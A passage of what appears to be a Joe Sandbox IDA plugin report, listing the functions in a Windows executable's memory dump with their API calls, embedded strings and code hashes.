Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: 7a35fdaeb27397247113f14a95fd2a021a56513dd3e51089d919ae589727bcd7
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: F371E772A00F16ABE7149E78CC65BAA73AAAF01365F14422DFC12DB7C1E770DA4487D4

Function 00674DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00674DF8
GetMenuItemInfoW.USER32(006F1708,000000FF,00000000,00000030), ref: 00674E59
SetMenuItemInfoW.USER32(006F1708,00000004,00000000,00000030), ref: 00674E8F
Sleep.KERNEL32(000001F4), ref: 00674EA1
GetMenuItemCount.USER32(?), ref: 00674EE5
GetMenuItemID.USER32(?,00000000), ref: 00674F01
GetMenuItemID.USER32(?,-00000001), ref: 00674F2B
GetMenuItemID.USER32(?,?), ref: 00674F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00674FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00674FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00674FEB

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: ad5e4dbcb39076748149b67af4901dfa3d32c3a505c2fe4e1419977ead9432f5
Instruction ID: f6c33aaac08def19bfb97eabeb965b50a79939007c0cae3df9d2ee6f80f63414
Opcode Fuzzy Hash: ad5e4dbcb39076748149b67af4901dfa3d32c3a505c2fe4e1419977ead9432f5
Instruction Fuzzy Hash: 7261B3B1900249EFDB21CF64DC88AFE7BBAFB45344F148159F409A7251EB75AD45CB20

Function 00699C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00699C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00699C9B
GetWindowLongW.USER32(?,000000F0), ref: 00699CBF
_memset.LIBCMT ref: 00699CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00699CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00699D5A

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 4b539417d1b4f462087005e4727740cbaa84c676b598ae090987d427728dd00a
Instruction ID: 6e64af87a23609f70e2705d16556029fd9baeffd73b999bc183957346e3def5c
Opcode Fuzzy Hash: 4b539417d1b4f462087005e4727740cbaa84c676b598ae090987d427728dd00a
Instruction Fuzzy Hash: 55615875900208AFDB10DFA8CC81EEEB7B9EF09714F14415AFA04EB3A1D770A946DB60

Function 006694E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 006694FE
SafeArrayAllocData.OLEAUT32(?), ref: 00669549
VariantInit.OLEAUT32(?), ref: 0066955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 0066957B
VariantCopy.OLEAUT32(?,?), ref: 006695BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 006695D2
VariantClear.OLEAUT32(?), ref: 006695E7
SafeArrayDestroyData.OLEAUT32(?), ref: 006695F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006695FD
VariantClear.OLEAUT32(?), ref: 0066960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0066961A

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 42bce4a8715e400fb2a5a5021f51f8d078e4acef62fdfc7aa4762be3f2ea8f55
Instruction ID: 6b0f5a1b7cfa50310323cd831d9b853309d0e2a94ed971079058b1299b98c5ea
Opcode Fuzzy Hash: 42bce4a8715e400fb2a5a5021f51f8d078e4acef62fdfc7aa4762be3f2ea8f55
Instruction Fuzzy Hash: 22413075900219AFDB01DFA4D8449DEBFBAFF48354F008069E902A7251EB31AA85CBA5

Function 0068BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0068BB5C
VariantInit.OLEAUT32(?), ref: 0068BC2D
VariantInit.OLEAUT32(?), ref: 0068BD2E
VariantClear.OLEAUT32(?), ref: 0068BD38
VariantClear.OLEAUT32(?), ref: 0068BD99

Strings

h?n, xrefs: 0068BB2D
|?n, xrefs: 0068BB34
Null Object assignment in FOR..IN loop, xrefs: 0068BBBD, 0068BCEB, 0068BDA7
Incorrect Object type in FOR..IN loop, xrefs: 0068BD11

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?n$|?n
API String ID: 2862541840-3444190563
Opcode ID: c2bf9f56da1f1f760149bdb92599f66dbb512f8da80313c8926ce38d2ca5fe41
Instruction ID: d7a710de7d27443cfdeb102064328e359f8893786ee49b9786f2328e322f5fde
Opcode Fuzzy Hash: c2bf9f56da1f1f760149bdb92599f66dbb512f8da80313c8926ce38d2ca5fe41
Instruction Fuzzy Hash: A091B271A00219AFDF24EF95C848FEEBBBAEF45710F109659F515AB280DB709941CFA0

Function 0068ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 0063936C: __swprintf.LIBCMT ref: 006393AB
Part of subcall function 0063936C: __itow.LIBCMT ref: 006393DF

CoInitialize.OLE32 ref: 0068ADF6
CoUninitialize.OLE32 ref: 0068AE01
CoCreateInstance.OLE32(?,00000000,00000017,006BD8FC,?), ref: 0068AE61
IIDFromString.OLE32(?,?), ref: 0068AED4
VariantInit.OLEAUT32(?), ref: 0068AF6E
VariantClear.OLEAUT32(?), ref: 0068AFCF

Strings

Failed to create object, xrefs: 0068AE6C, 0068AF22
NULL Pointer assignment, xrefs: 0068AEA6
Invalid parameter, xrefs: 0068AEED

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: bda172329f3190537546d92d0f4e5e7ee423caf34ebad24e35f8996cac9b730a
Instruction ID: 2da92f4a1e4b43e105192c03ba863654fbd33a4e57ddc5d48a1a345ed7a2b31f
Opcode Fuzzy Hash: bda172329f3190537546d92d0f4e5e7ee423caf34ebad24e35f8996cac9b730a
Instruction Fuzzy Hash: A761A1702083119FE710EF94C848B6EB7EAAF48714F104A1EFA859B291D770ED45CB97

Function 00688107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00688168
inet_addr.WSOCK32(?,?,?), ref: 006881AD
gethostbyname.WSOCK32(?), ref: 006881B9
IcmpCreateFile.IPHLPAPI ref: 006881C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00688237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0068824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 006882C2
WSACleanup.WSOCK32 ref: 006882C8

Strings

Ping, xrefs: 006881EB

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 1358ace6ea8c1f8bc09dee9edba8048cb97bff76428f5bc01a21bd152531ec49
Instruction ID: 18a02fadf5f06255a66f9d3a36e5e3d3d0d5b614017bc1126b3581597ac8eb2b
Opcode Fuzzy Hash: 1358ace6ea8c1f8bc09dee9edba8048cb97bff76428f5bc01a21bd152531ec49
Instruction Fuzzy Hash: 5D51A3716047019FD750AF24CC99B6AB7E6EF44320F448A29FA95DB3A1DF70E941CB81

Function 0067E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0067E396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0067E40C
GetLastError.KERNEL32 ref: 0067E416
SetErrorMode.KERNEL32(00000000,READY), ref: 0067E483

Strings

READY, xrefs: 0067E45C
READONLY, xrefs: 0067E44E
INVALID, xrefs: 0067E455
UNKNOWN, xrefs: 0067E43B
NOTREADY, xrefs: 0067E442

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: f5df2e6a8b6137d21e4c722e04b7ddbb6e6f0b19da5ee0b0044086c1371b77c1
Instruction ID: 37847ab56e6ce4407ead92dd557c7adda6cb5894ebed6ed06849a4a628063e9b
Opcode Fuzzy Hash: f5df2e6a8b6137d21e4c722e04b7ddbb6e6f0b19da5ee0b0044086c1371b77c1
Instruction Fuzzy Hash: A831A335A002059FDB00DF68C849AADB7FAEF18704F14C099F50AEB395D671DA46CB91

Function 0066B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0066B98C
GetDlgCtrlID.USER32 ref: 0066B997
GetParent.USER32 ref: 0066B9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 0066B9B6
GetDlgCtrlID.USER32(?), ref: 0066B9BF
GetParent.USER32(?), ref: 0066B9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 0066B9DE

Strings

ComboBox, xrefs: 0066B911
ListBox, xrefs: 0066B949

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 33f2b9378401b2103c66284650a2561ff1e4ade9f6aee587193d40898e5ce394
Instruction ID: 52fc379c7aa8540f499d4542742ee8093092ddb1d1422887424d253f366944ab
Opcode Fuzzy Hash: 33f2b9378401b2103c66284650a2561ff1e4ade9f6aee587193d40898e5ce394
Instruction Fuzzy Hash: DD21C8B4A00104BFDB04ABA4CC95EFEB777EF46310F100219F552A72D1EB745856DB64

Function 0066B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0066BA73
GetDlgCtrlID.USER32 ref: 0066BA7E
GetParent.USER32 ref: 0066BA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 0066BA9D
GetDlgCtrlID.USER32(?), ref: 0066BAA6
GetParent.USER32(?), ref: 0066BAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 0066BAC5

Strings

ComboBox, xrefs: 0066B9FA
ListBox, xrefs: 0066BA32

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 2c2bb82d1e3524a9537f7f7597e1de7f9468a81a29562075502c2e879292e399
Instruction ID: 04c3b08f81f56eeed3b33784a70c55778f933d96c02b99b3e4d4efd5433e3ded
Opcode Fuzzy Hash: 2c2bb82d1e3524a9537f7f7597e1de7f9468a81a29562075502c2e879292e399
Instruction Fuzzy Hash: C921C2B4A00208BFDB00ABA4CC85EFEBB7BEF45300F100119F952A7291EB75595A9B64

Function 0066BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0066BAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 0066BAF8
_wcscmp.LIBCMT ref: 0066BB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0066BB85

Strings

largeicons, xrefs: 0066BB19
list, xrefs: 0066BB67
details, xrefs: 0066BB33
SHELLDLL_DefView, xrefs: 0066BB04
smallicons, xrefs: 0066BB4D

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: a121dc888180f468390c0a3721fb0e861e0171ccddb648c34366682354784189
Instruction ID: ab2e12d5180b288868094c3e3ce68b445c14e70e8f05c6cbc19d8fe89c7c0838
Opcode Fuzzy Hash: a121dc888180f468390c0a3721fb0e861e0171ccddb648c34366682354784189
Instruction Fuzzy Hash: 83112576648347FAFB246A35EC17DE6379F9B21724F20103AFD04E80D9FFA1A8914618

Function 0068B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0068B2D5
CoInitialize.OLE32(00000000), ref: 0068B302
CoUninitialize.OLE32 ref: 0068B30C
GetRunningObjectTable.OLE32(00000000,?), ref: 0068B40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 0068B539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0068B56D
CoGetObject.OLE32(?,00000000,006BD91C,?), ref: 0068B590
SetErrorMode.KERNEL32(00000000), ref: 0068B5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0068B623
VariantClear.OLEAUT32(006BD91C), ref: 0068B633

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 4c6cf109d9dd29a438eaee2ea86f314613ea54751acf96a542c6b8c849c36354
Instruction ID: 63e63765e2d4bef924055a26992aa901270378c4a09de8f41e63cef3c909a18e
Opcode Fuzzy Hash: 4c6cf109d9dd29a438eaee2ea86f314613ea54751acf96a542c6b8c849c36354
Instruction Fuzzy Hash: C9C124B1608301AFC700EF64C88496BB7EAFF88304F045A5DF58A9B251DB71ED46CB92

Function 0065ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0065ACC1

Part of subcall function 00657CF4: __mtinitlocknum.LIBCMT ref: 00657D06
Part of subcall function 00657CF4: EnterCriticalSection.KERNEL32(00000000,?,00657ADD,0000000D), ref: 00657D1F

__calloc_crt.LIBCMT ref: 0065ACD2

Part of subcall function 00656986: __calloc_impl.LIBCMT ref: 00656995
Part of subcall function 00656986: Sleep.KERNEL32(00000000,000003BC,0064F507,?,0000000E), ref: 006569AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 0065ACED
GetStartupInfoW.KERNEL32(?,006E6E28,00000064,00655E91,006E6C70,00000014), ref: 0065AD46
__calloc_crt.LIBCMT ref: 0065AD91
GetFileType.KERNEL32(00000001), ref: 0065ADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0065AE11

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: 7187251bd827b2ffab5bd29b1ff34b6d0d8adb61ae7b0d76dae4b5d35a22b399
Instruction ID: 49576e6f6438d42e8af566c9f33f3c896611a8e001e99b1ed8f0431ac7e02eae
Opcode Fuzzy Hash: 7187251bd827b2ffab5bd29b1ff34b6d0d8adb61ae7b0d76dae4b5d35a22b399
Instruction Fuzzy Hash: FA81F1B09053468FDB14CFA8C8415A9BBF2BF09326F24535DE8A6AB3D1D7349807CB56

Function 00674025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00674047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,006730A5,?,00000001), ref: 0067405B
GetWindowThreadProcessId.USER32(00000000), ref: 00674062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006730A5,?,00000001), ref: 00674071
GetWindowThreadProcessId.USER32(?,00000000), ref: 00674083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,006730A5,?,00000001), ref: 0067409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006730A5,?,00000001), ref: 006740AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006730A5,?,00000001), ref: 006740F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,006730A5,?,00000001), ref: 00674108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,006730A5,?,00000001), ref: 00674113

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: d6e73fda468b5d95541a21fa0feebb5caeb25b8274e96558d9f4330de15dbc60
Instruction ID: 780b6b57170bbb9204fc240c05405c4d39cef28861fc4b529eb169b0f57cb18c
Opcode Fuzzy Hash: d6e73fda468b5d95541a21fa0feebb5caeb25b8274e96558d9f4330de15dbc60
Instruction Fuzzy Hash: D63191B5500214AFDB10EF68DC9ABB977ABBB64311F11D115F908EA390EFB49980CF60

Function 006ADD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0064B496
SetTextColor.GDI32(?,000000FF), ref: 0064B4A0
SetBkMode.GDI32(?,00000001), ref: 0064B4B5
GetStockObject.GDI32(00000005), ref: 0064B4BD
GetClientRect.USER32(?), ref: 006ADD63
SendMessageW.USER32(?,00001328,00000000,?), ref: 006ADD7A
GetWindowDC.USER32(?), ref: 006ADD86
GetPixel.GDI32(00000000,?,?), ref: 006ADD95
ReleaseDC.USER32(?,00000000), ref: 006ADDA7
GetSysColor.USER32(00000005), ref: 006ADDC5

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: f776f0db2bbf1e963239545e2132f4670e92c287291f56dc23e9099a0acb2d34
Instruction ID: 24ad6339300ee53e5300b6aca3de8989c04ac6301d236234add31e31e136dfd5
Opcode Fuzzy Hash: f776f0db2bbf1e963239545e2132f4670e92c287291f56dc23e9099a0acb2d34
Instruction Fuzzy Hash: AB1179B5500205FFDB216BA4EC08BE97BB7EB05325F109721FA66991E2EB314981DF20

Function 00633093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 006330DC
CoUninitialize.OLE32(?,00000000), ref: 00633181
UnregisterHotKey.USER32(?), ref: 006332A9
DestroyWindow.USER32(?), ref: 006A5079
FreeLibrary.KERNEL32(?), ref: 006A50F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 006A5125

Strings

